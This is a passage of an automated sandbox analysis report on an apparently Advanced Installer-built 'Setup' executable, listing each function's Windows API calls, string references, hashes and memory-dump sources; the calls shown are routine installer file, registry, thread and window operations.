Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Strings

&_', xrefs: 00872C27

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window$Item$RectText$ActiveAllocateCurrentErrorExceptionHeapInvalidateLastRaiseShowThread
String ID: &_'
API String ID: 1085195845-2411122644
Opcode ID: 432e9b804d1b6ef3c0365ff47237b8ce6cb9ae8b226741ca440c9a867498243c
Instruction ID: 789d464c943faf8209abf175e91b2c341ded35d8c6d4f6fd3b4912ee57d06273
Opcode Fuzzy Hash: 432e9b804d1b6ef3c0365ff47237b8ce6cb9ae8b226741ca440c9a867498243c
Instruction Fuzzy Hash: B1719B71A04749EFDB11DFA8DC49B9EBBB5FF08310F148619E529A72A1CB70A941CF81

Function 006F36E0 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 263
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W,?), ref: 006F37D7
GetProcAddress.KERNEL32(00000000), ref: 006F37DE
GetWindowsDirectoryW.KERNEL32(?,00000104,275F26E1,?,?), ref: 006F3824
PathFileExistsW.SHLWAPI(?), ref: 006F384C
CreateDirectoryW.KERNEL32(?,?,S-1-5-32-544,10000000,00000001,S-1-5-18,10000000,00000001), ref: 006F38D7

Part of subcall function 00911995: AcquireSRWLockExclusive.KERNEL32(00A66A70,?,?,?,006EB3A6,00A67624,275F26E1,?,?,0093CBDD,000000FF,?,008898BD,275F26E1,?), ref: 009119A0
Part of subcall function 00911995: ReleaseSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB3A6,00A67624,275F26E1,?,?,0093CBDD,000000FF,?,008898BD,275F26E1,?), ref: 009119DA

GetTempPathW.KERNEL32(00000104,?,275F26E1,?,?), ref: 006F38FA

Part of subcall function 00911944: AcquireSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB417,00A67624,009A5310), ref: 0091194E
Part of subcall function 00911944: ReleaseSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB417,00A67624,009A5310), ref: 00911981
Part of subcall function 00911944: WakeAllConditionVariable.KERNEL32(00A66A6C,?,?,006EB417,00A67624,009A5310), ref: 0091198C

Strings

GetTempPath2W, xrefs: 006F37CD
S-1-5-18, xrefs: 006F3879
S-1-5-32-544, xrefs: 006F388A
\SystemTemp\, xrefs: 006F382A
&_', xrefs: 006F370B, 006F3A24
Kernel32.dll, xrefs: 006F37D2

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExclusiveLock$AcquireDirectoryPathRelease$AddressConditionCreateExistsFileHandleModuleProcTempVariableWakeWindows
String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$\SystemTemp\$&_'
API String ID: 3143601600-885069586
Opcode ID: 56db14d8d426cbd996980d1f6bcacba44d23b3e1f9751f2b2075e5563326ae18
Instruction ID: 9e4b9351832fa8bccdd1d2affca58401af4237d95276b720ae27363a4d2b3b88
Opcode Fuzzy Hash: 56db14d8d426cbd996980d1f6bcacba44d23b3e1f9751f2b2075e5563326ae18
Instruction Fuzzy Hash: D1A1C3B1D04218ABDB10EFA4DC8ABEDB7B4EB44310F1041A9E509A7391EBB45F84CB91

Function 00866E20 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 304
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetExitCodeThread.KERNEL32(?,?,275F26E1,00000000,00000000,?,?,?,00000000,0098C955,000000FF,?,0085FC52,?,000000DC,00000000), ref: 00866E66

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00866F1B
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00866F45

Part of subcall function 006EA7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,0088A498,\\.\pipe\ToServer,?,00000000,?,?,00941D06,000000FF,?,00889991), ref: 006EA7C3

Part of subcall function 0082B5C0: MultiByteToWideChar.KERNEL32(00000003,00000000,0086E395,000000FF,00000000,00000000,00000000,?,?,0086E395,009D5C9A), ref: 0082B5D8
Part of subcall function 0082B5C0: MultiByteToWideChar.KERNEL32(00000003,00000000,0086E395,000000FF,?,-00000001,?,0086E395,009D5C9A), ref: 0082B60A

WriteFile.KERNEL32(?,000000DC,?,000000FF,00000000,CLOSE,00000005), ref: 008670CA
FlushFileBuffers.KERNEL32(?), ref: 008670D3

Part of subcall function 00889A40: CloseHandle.KERNEL32(?,275F26E1,?,00000010,?,00000000,00992F13,000000FF,?,0086662C,00000000,00000000,00000000,00000001,?,0000000D), ref: 00889A7A

Strings

CLOSE, xrefs: 0086708D, 0086709F, 008670A9
Advinst_Estimate_, xrefs: 00866EB2, 00866EC4, 00866ECE
&_', xrefs: 00866E37

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ByteCharMultiWide$File$BuffersCloseCodeExitFindFlushHandleHeapProcessResourceThreadWrite
String ID: Advinst_Estimate_$CLOSE$&_'
API String ID: 1271795120-2054719491
Opcode ID: b501253f44bf0a6aeb8a6df6bcc058abcb8f74cb1580d41dadf983e9467bf9f4
Instruction ID: b24ae211d2fb5d0ac752bcec74459b02eaf6676ff55e3aa4b8351f9d3a54c585
Opcode Fuzzy Hash: b501253f44bf0a6aeb8a6df6bcc058abcb8f74cb1580d41dadf983e9467bf9f4
Instruction Fuzzy Hash: CCB1FF30A042499BDB00DBA8CC55BAEBBB5FF45324F19415CE811A73D2DF749D05CBA1

Function 0084E970 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 294
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,275F26E1,00000000,00000000,?), ref: 0084E9CB
GetTempFileNameW.KERNEL32(?,shim_clone,00000000,?,?,00000000,00000000), ref: 0084EB6D
Wow64DisableWow64FsRedirection.KERNEL32(00000000,?,?,00000000,00000000), ref: 0084EC21
CopyFileW.KERNEL32(?,?,00000000,?,?,00000000,00000000), ref: 0084EC43
Wow64RevertWow64FsRedirection.KERNEL32(00000000,?,?,00000000), ref: 0084EC6F

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

DeleteFileW.KERNEL32(?,275F26E1,?,00000000,0093C6B0,000000FF,?,80070057,80004005,?), ref: 0084ED2D

Strings

shim_clone, xrefs: 0084EB67
&_', xrefs: 0084E987, 0084ED12

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Wow64$File$Redirection$AllocateCopyDeleteDisableFolderHeapNamePathRevertTemp
String ID: shim_clone$&_'
API String ID: 4011074531-3116391379
Opcode ID: 09758a3b29a3561abe49b84a4d5aa4cb106c95694d46a36b8dab6263f9e0bdc7
Instruction ID: bdce3bd6f7466325786a71680eacac7e0a7a8abf9611d70a0131baa0de13c2c4
Opcode Fuzzy Hash: 09758a3b29a3561abe49b84a4d5aa4cb106c95694d46a36b8dab6263f9e0bdc7
Instruction Fuzzy Hash: E8B11371A0425C9FDB24DF68CC45BAAB7B5FF54310F1440E9E90AE7282EB70AE44CB55

Function 00868ED0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000002), ref: 00868EED
GetWindowRect.USER32(00000000,?), ref: 00868F03
ShowWindow.USER32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00872C6D), ref: 00868F18
InvalidateRect.USER32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00872C6D), ref: 00868F23
GetDlgItem.USER32(?,000003E9), ref: 00868F31
GetWindowRect.USER32(00000000,?), ref: 00868F47
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,00000000), ref: 00868F86

Strings

&_', xrefs: 00868ED9

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window$Rect$Item$InvalidateShow
String ID: &_'
API String ID: 2147159307-2411122644
Opcode ID: f1a11a626a3c23e83639fec60c6abf4802cb04ae335dc1e4b510c15ae59234e9
Instruction ID: 304481830752cb3e7c2decb9dc0be8aeaa883b0db3647660197847827b18fce1
Opcode Fuzzy Hash: f1a11a626a3c23e83639fec60c6abf4802cb04ae335dc1e4b510c15ae59234e9
Instruction Fuzzy Hash: CD21AF71604701AFE300DF78DD49B6BBBE8FF89700F008619F459D6590EB70AD958B92

Function 00910DFB Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DecodePointer.KERNEL32(?,?,?,00911141,00A66A2C,?,?,?,0088986D,?,?,?,00000001,?), ref: 00910E0D
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00911141,00A66A2C,?,?,?,0088986D,?,?,?,00000001), ref: 00910E22
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00910E9E

Strings

AtlThunk_FreeData, xrefs: 00910E78
AtlThunk_InitData, xrefs: 00910E4A
atlthunk.dll, xrefs: 00910E1D
AtlThunk_DataToCode, xrefs: 00910E61
AtlThunk_AllocateData, xrefs: 00910E33

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 20015364097b79b22cd1e240f8f0612710c4adfc6b684b371f3f134fcbf8140e
Instruction ID: 56f5ecc3ff1b87833867d6411394e0acf95650e272af1c40c883a54d62e91408
Opcode Fuzzy Hash: 20015364097b79b22cd1e240f8f0612710c4adfc6b684b371f3f134fcbf8140e
Instruction Fuzzy Hash: AE01C831B55218FBDB219B519C03FD63B687FDA78CF084854FC4776192D7D285C58582

Function 0086D6E0 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 448
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,275F26E1), ref: 0086D747
GetLastError.KERNEL32 ref: 0086DA7A
GetLastError.KERNEL32 ref: 0086DB0A
GetLastError.KERNEL32 ref: 0086D756

Part of subcall function 00848020: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,275F26E1,?,00000000), ref: 0084806B
Part of subcall function 00848020: GetLastError.KERNEL32(?,00000000), ref: 00848075

ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 0086D869
ReadFile.KERNEL32(?,?,00000000,00000000,00000000,00000001), ref: 0086D8C0

Strings

&_', xrefs: 0086D70A, 0086DBC6

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorLast$File$Read$FormatMessagePointer
String ID: &_'
API String ID: 3903527278-2411122644
Opcode ID: 564bb67637d041eef817aac314592f7b79fd50d41ad5e0330cacacb4042ce74f
Instruction ID: 3d771d4c32957b1a4565ac198c1ff7941370fae22c2d8f8253bb2b071860b7e2
Opcode Fuzzy Hash: 564bb67637d041eef817aac314592f7b79fd50d41ad5e0330cacacb4042ce74f
Instruction Fuzzy Hash: 6E02CE71E046099FDB04CFA8C845BAEFBB5FF48324F158259E825E7391DB74AA01CB91

Function 0086DC30 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 364
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,275F26E1,00000000,?,?,?,?,?,?,?,?,00000000,0098DC22), ref: 0086DC87
GetLastError.KERNEL32(?,?,?), ref: 0086DF45
GetLastError.KERNEL32(?,?), ref: 0086E006
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0098DC22), ref: 0086DC96

Part of subcall function 00848020: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,275F26E1,?,00000000), ref: 0084806B
Part of subcall function 00848020: GetLastError.KERNEL32(?,00000000), ref: 00848075

ReadFile.KERNEL32(?,00000000,00000008,?,00000000,?,?), ref: 0086DD5A
ReadFile.KERNEL32(?,?,00000000,00000000,00000000,00000001,?,?,?), ref: 0086DDE9

Strings

&_', xrefs: 0086DC47

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorLast$File$Read$FormatMessagePointer
String ID: &_'
API String ID: 3903527278-2411122644
Opcode ID: 816eec6673ea2bdb461cfc44c1b1d796a98b6f32f39851da0412118b02c73956
Instruction ID: f259a2bc3edfe93056e3bf81458b2798dfeaa8279f79cac7bb4751629d3e6081
Opcode Fuzzy Hash: 816eec6673ea2bdb461cfc44c1b1d796a98b6f32f39851da0412118b02c73956
Instruction Fuzzy Hash: 33E1AC70A00209DFDF04DFA8C885BAEB7B5FF44314F154169E815EB392DB74AA06CB91

Function 00841100 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 250registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,275F26E1), ref: 00841344
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0084135B
RegCloseKey.ADVAPI32(00000000), ref: 008413B5

Strings

RegOpenKeyTransactedW, xrefs: 00841355
Advapi32.dll, xrefs: 0084133F
&_', xrefs: 00841128

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: Advapi32.dll$RegOpenKeyTransactedW$&_'
API String ID: 4190037839-3584038943
Opcode ID: e2288256d8c0fff03313db42e6fd09fb48cc1c1d25a6c316cf79f882e34e1508
Instruction ID: 6f352960b454074a21681172bff3eb3f43842d36237285e22a92861b5a6756ae
Opcode Fuzzy Hash: e2288256d8c0fff03313db42e6fd09fb48cc1c1d25a6c316cf79f882e34e1508
Instruction Fuzzy Hash: 26A148B0E043489FDB14CFA8C949B9EBBF5FF54304F204259E419EB691DB75AA84CB90

Function 0088DEC0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(000000FF,-00000400,?,00000002,00000400,275F26E1,?,?,?), ref: 0088DF66
GetLastError.KERNEL32(?,?,?), ref: 0088DF74
ReadFile.KERNEL32(000000FF,00000000,00000400,?,00000000,?,?,?), ref: 0088DF8F

Strings

&_', xrefs: 0088DED7
ADVINSTSFX, xrefs: 0088DFC3, 0088E07E

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: File$ErrorLastPointerRead
String ID: ADVINSTSFX$&_'
API String ID: 64821003-315341322
Opcode ID: b01a570585926f38b6f6f828b598fc49062fd7439dd15777ba530862ffb30915
Instruction ID: 24669d4f596653345dce3e6afe61ad1f7621f93f43531696367ce71c67ecee15
Opcode Fuzzy Hash: b01a570585926f38b6f6f828b598fc49062fd7439dd15777ba530862ffb30915
Instruction Fuzzy Hash: 90612071A042099BDB14EFA8C884BBEBBB5FF45314F144A69E912EB3C1D7709D41CBA0

Function 007313A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 156COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 007313EA
std::_Lockit::_Lockit.LIBCPMT ref: 0073140C
std::_Lockit::~_Lockit.LIBCPMT ref: 00731434
__Getctype.LIBCPMT ref: 00731515
std::_Facet_Register.LIBCPMT ref: 00731577
std::_Lockit::~_Lockit.LIBCPMT ref: 007315AB

Strings

&_', xrefs: 007313CD

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID: &_'
API String ID: 1102183713-2411122644
Opcode ID: 757e3307f7cbab7be2a15360e53ffe173a10357a063e0b29b40be5dd92165ad5
Instruction ID: c29002db5ca52523b556776ef6150ad63917944d966f094ead9b70861113acd3
Opcode Fuzzy Hash: 757e3307f7cbab7be2a15360e53ffe173a10357a063e0b29b40be5dd92165ad5
Instruction Fuzzy Hash: 1F61BEB1D04249DFEB10CF98C941BAEFBB4FF54314F148299D805AB392E774AA45CB91

Function 0082D660 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 91registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,275F26E1,00000000), ref: 0082D6A5
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 0082D6BC
RegCreateKeyExW.KERNEL32(?,0084143F,00000000,00000000,00000000,00000000,00000000,00000000,?,275F26E1,00000000), ref: 0082D715
RegCloseKey.ADVAPI32(00000000), ref: 0082D728

Strings

RegCreateKeyTransactedW, xrefs: 0082D6B6
Advapi32.dll, xrefs: 0082D6A0
&_', xrefs: 0082D677

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AddressCloseCreateHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW$&_'
API String ID: 1765684683-1043018141
Opcode ID: 6a35ea94bc7b5364450cc7661f45ca07eea9eda6992a3f0dfcd0ea1e66630d03
Instruction ID: 24ea9af70496796dc90d7f3eab9dbc0ffebec06d634fe2f7d61ce11dc4718101
Opcode Fuzzy Hash: 6a35ea94bc7b5364450cc7661f45ca07eea9eda6992a3f0dfcd0ea1e66630d03
Instruction Fuzzy Hash: 45318F71604319AFDB118F98DC45FAABFB8FB05710F204129F909E62D0EB74E880CA94

Function 00872E80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69threadsynchronizationCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00890360,009F2FF4,00000000,?), ref: 00872EFD
GetLastError.KERNEL32 ref: 00872F0A
WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 00872F33
GetExitCodeThread.KERNEL32(00000000,?), ref: 00872F4D
TerminateThread.KERNEL32(00000000,00000000), ref: 00872F65
CloseHandle.KERNEL32(00000000), ref: 00872F6E

Strings

&_', xrefs: 00872E94

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
